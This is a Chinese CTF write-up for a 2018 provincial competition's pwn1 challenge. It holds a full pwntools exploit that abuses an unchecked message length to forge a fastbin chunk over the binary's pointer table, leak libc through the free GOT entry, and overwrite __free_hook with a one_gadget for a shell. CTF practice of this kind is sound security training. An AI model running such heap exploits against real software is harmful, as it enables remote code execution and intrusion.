18年省赛线下pwn1

之前看到的，然后就做了一下,洞很多,利用方式也很多样。我当时挑了一个我还算熟悉的方式来做。(结果还是做了将近2个小时,换到现场比赛早结束了)

大体就是构造一个chunk到题目里保存堆指针的地方,具体的我也忘了。放一下当时画的图(草稿)

这题好像是不限制你的输入长度的,看了图想起来了,就是通过改下一个chunk的头来做
#!/usr/bin/env python
# coding=utf-8
from pwn import *
# from libnum import *

context.log_level = 'debug'
context.terminal = ['xfce4-terminal','-x','bash','-c']
# context.arch = 'i386'

# Short aliases over the pwntools tube `sh`, which is created further down.
# Each alias resolves `sh` at call time, so defining them first is fine.
def s(string):
  return sh.send(string)

def sl(string):
  return sh.sendline(string)

def sla(delim, string):
  return sh.sendlineafter(delim, string)

def sa(delim, string):
  return sh.sendafter(delim, string)

def ru(string):
  return sh.recvuntil(string)

def rl():
  return sh.recvline()

def rv():
  return sh.recv()

def it():
  return sh.interactive()

def cl():
  return sh.close()

# Target selection: `local` picks the endpoint the exploit talks to.
# Both paths load the same pwn1 binary and the same libc 2.23 build; the
# remote path only suppresses pwntools' checksec print-out.
local = 1
# Alternatives the author toggles for a local run:
#   sh = gdb.debug('./orw','b *0x08048571\nc')
#   sh = process('./pwn1')
sh = remote('0.0.0.0', 9999) if local else remote('buuoj.cn', 20001)
# `bin` shadows the builtin of the same name; kept because later lines
# read bin.got through this name.
bin = ELF('./pwn1')
libc = ELF('/root/ctf/PWN/libc/libc6_2.23-0ubuntu11_amd64.so', checksec=bool(local))
# libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
def z(a=''):
  """Attach gdb to the running pwn1 and feed it the gdb script `a`.

  With an empty script the exploit pauses on raw_input() so breakpoints
  can be set by hand before it continues.
  """
  wait_for_user = (a == '')
  gdb.attach('pwn1', a, exe='./pwn1')
  if wait_for_user:
    raw_input()

def add(index, size, content):
  """Menu option 1: allocate slot `index` with `size` bytes and send `content`.

  The script waits for a different prompt once the requested length is
  above 0x20, so the prompt is chosen from `size` before the exchange.
  Nothing here bounds `content` by `size`; the binary is expected to
  accept the longer message.
  """
  if size > 0x20:
    prompt = 'message too long, you can leave on memo though\n'
  else:
    prompt = 'Message: '
  sla('>> ', '1')
  sla('Index: ', str(index))
  sla('Length: ', str(size))
  sla(prompt, content)

def change_target(index):
  """Select slot `index` as the current message via menu option 1.

  Only the index is answered; no length or content follows, unlike add().
  NOTE(review): waits for '>>' without the trailing space the other
  helpers use — presumably harmless, but confirm against the binary.
  """
  idx = str(index)
  sla('>>', '1')
  sla('Index: ', idx)

def update(content):
  """Menu option 2: overwrite the currently selected message with `content`."""
  menu_choice = '2'
  sla('>> ', menu_choice)
  sla('Edit message: ', content)

def free(index):
  """Menu option 4: release slot `index`.

  The exploit body later rebinds the module-level name `free` to the
  leaked libc address, after which this helper is no longer reachable by
  name and option 4 has to be sent by hand.
  """
  idx = str(index)
  sla('>> ', '4')
  sla(':', idx)

def dump(index):
  """Menu option 3: ask the binary to print slot `index`.

  Nothing is read back here; the caller consumes the output from the tube.
  """
  idx = str(index)
  sla('>> ', '3')
  sla('Index: ', idx)

# ---- exploit sequence ----
# Written for Python 2 pwntools: recv()/recvline() return `str`, which is
# why `rl()[:6] + '\x00'*2` below concatenates raw bytes without b''.
sla(': ', 'youzhiyuan')    # name prompt
sla(') ', 'n')             # presumably a "(y/n)" question; answered 'n'
# Three slots. Slot 1 is requested as 0x10 bytes but is sent 0x20: the
# binary does not bound the message write by the requested length (the
# write-up notes the input length is unchecked). That missing bounds check
# is the root-cause defect; enforcing the requested length on the write
# would close it.
add(0,0x20,'a'*0x20)
add(1,0x10,'b'*0x20)
add(2,0x20,'c'*0x20)
# Free slot 1, then slot 0 (sizes that, under the glibc 2.23 build loaded
# above, presumably land in the fastbins).
free(1)
free(0)
# 0x40 > 0x20, so add() waits for the "message too long" prompt. Past the
# first 0x20 bytes the payload is a forged chunk header (prev_size 0,
# size 0x21) followed by 0x602A60 — an address inside the binary where,
# per the write-up, it keeps its heap pointers. The heap layout that makes
# this overwrite the next chunk's header is not visible here.
add(0,0x40,'d'*0x20+'\x00'*8 + '\x21' + '\x00'*7 + p64(0x602A60))
# Two more allocations; after these, slot 0's storage presumably overlaps
# the pointer table itself, so update() can rewrite its entries.
add(1,0x10,'e'*0x10)
add(0,0x10,'hello world')
# Rewrite two table entries: slot 0 -> free's GOT entry, slot 1 -> 0x602A70.
# dump(0) then prints through the first one, leaking free's libc address.
update(p64(bin.got['free']) + p64(0x602A70))
dump(0)
ru('View Message: ')
# NOTE: this rebinds the helper free() to an int; that is why menu option 4
# is sent by hand further down instead of calling free(0).
free = u64(rl()[:6] + '\x00'*2)
libc_base = free - libc.symbols['free']
free_hook = libc_base + libc.symbols['__free_hook']
# The one_gadget offset is specific to the libc build loaded above.
one_gadget = libc_base + 0x4526a
# Slot 1's entry appears to point at slot 0's table entry, so updating
# slot 1 redirects slot 0 to __free_hook; updating slot 0 then writes the
# gadget address into the hook.
change_target(1)
update(p64(free_hook))
change_target(0)
update(p64(one_gadget))
# Menu option 4 (free) on slot 0 now goes through the overwritten hook;
# the resulting shell receives 'cat flag'.
sl('4')
sla('Index: ',str(0))
sl('cat flag')
# z('c')
it()
